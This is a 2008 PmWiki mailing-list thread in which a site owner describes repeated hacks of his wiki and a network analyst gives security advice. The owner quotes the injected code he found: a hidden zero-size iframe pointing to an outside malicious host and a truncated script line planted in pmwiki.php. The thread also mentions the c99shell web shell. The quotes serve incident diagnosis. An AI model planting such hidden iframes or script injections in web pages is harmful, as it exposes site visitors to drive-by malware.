[pmwiki-users] More hacking

Erik Haagensen erik.haa at gmail.com
Wed Sep 3 09:49:07 CDT 2008

- Configuration file is set to allow upload of gif, jpeg, jpg, png,
htm and html files. I've had a look in the upload directories - and
for the moment I could not find anything suspicious.

- Include markup is not used.

The pmWiki.php-file is infected with this line:
$HTMLEndFmt = "\n<script

I don't know how this works, but it seems to write this at the end of
many html and asp files at the site.

2008/9/3 Greg T. Grimes <greg.grimes at msstate.edu>:
> Are these files writeable by the web server?  Do you allow uploads to your
> site?  Standard security practice says not to allow the web server write
> access to any files on your system.  This is especially true for your
> webpages.  If you do allow uploads you might want to check your upload
> directory for files that could be used to gain access to your server.
> c99shell is an example.  Another thing to look for are file include
> vulnerabilities.  For example, if you take input for a form and then use
> that input to include a certain file based on the input this can be used to
> launch scripts that aren't even hosted on your server.  I'm currently not
> aware of any File Include Vulns in pmwiki.  Just a quick look at the code
> and I don't see any obvious ones.
> On Wed, 3 Sep 2008, Erik Haagensen wrote:
>> Our site has been hacked several times during the last month.
>> It has been cleaned and checked by Site Analyzer - all ok.
>> After some days we have problems again.
>> The index.php (and several other files) contains this now:
>> <?php include('pmwiki.php');
>> <iframe src="http://mixlong.cn/in/" width=0 height=0
>> frameborder=0></iframe>
>> I don't know what more to do to avoid these problems.
>> --
>> mvh
>> Erik Haagensen
>> Oslia
>> NO-2550 Os i Østerdalen
> --
> Greg T. Grimes
> Network Analyst
> ITS -- Network Services
> Mississippi State University

Erik Haagensen
NO-2550 Os i Østerdalen
tlf: +47 62497332 / 94430332
N62.50439 E11.17562

More information about the pmwiki-users mailing list